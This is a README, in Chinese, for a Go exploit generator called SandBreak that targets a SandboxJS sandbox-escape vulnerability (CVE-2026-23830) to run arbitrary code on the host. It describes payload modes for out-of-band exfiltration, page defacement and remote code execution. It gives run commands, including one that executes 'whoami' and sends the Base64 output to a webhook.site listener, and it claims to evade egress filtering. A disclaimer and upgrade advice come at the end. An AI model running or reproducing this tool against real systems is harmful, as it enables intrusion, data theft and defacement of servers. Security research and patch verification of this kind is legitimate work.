SandBreak 是一款基于 Go 的健壮漏洞利用生成器,旨在利用 SandboxJS 逃逸漏洞(CVE-2026-23830)。
该工具利用了旧版 sandboxjs 中未受保护的 AsyncFunction 构造函数,允许攻击者突破 V8 沙箱环境并在主机系统上执行任意代码。它支持多种载荷模式,包括 盲注 OOB 数据外泄、网页篡改 和 基于错误的 RCE。
oob:带外数据外泄(HTTP/HTTPS),适用于盲注场景。calc:弹出 calc.exe(经典 PoC)。克隆仓库并运行:
git clone https://github.com/Galaxy-sc/CVE-2026-23830-SandBreak.git
cd CVE-2026-23830-SandBreak
go run CVE-2026-23830.go
go run CVE-2026-23830.go -mode [MODE] -cmd [COMMAND] [OPTIONS]
当没有输出反馈时使用此模式。它执行命令并将 Base64 编码的结果发送到你的监听器(例如 webhook.site)。
go run CVE-2026-23830.go -mode oob -cmd "whoami" -url "https://webhook.site/YOUR-UUID"
通过处理网络错误,成功绕过基本的出口过滤崩溃问题。
在 Windows 服务器上弹出计算器。
go run CVE-2026-23830.go -mode calc
尽管站点上没有可见输出,攻击者仍通过 Webhook 接收服务器的用户数据。
本工具仅用于教育目的和授权渗透测试。
将 sandboxjs 升级到最新版本,其中 AsyncFunction 构造函数已得到妥善的沙箱保护。
npm update sandboxjs
作者: Meysam Bal-afkan
许可证: MIT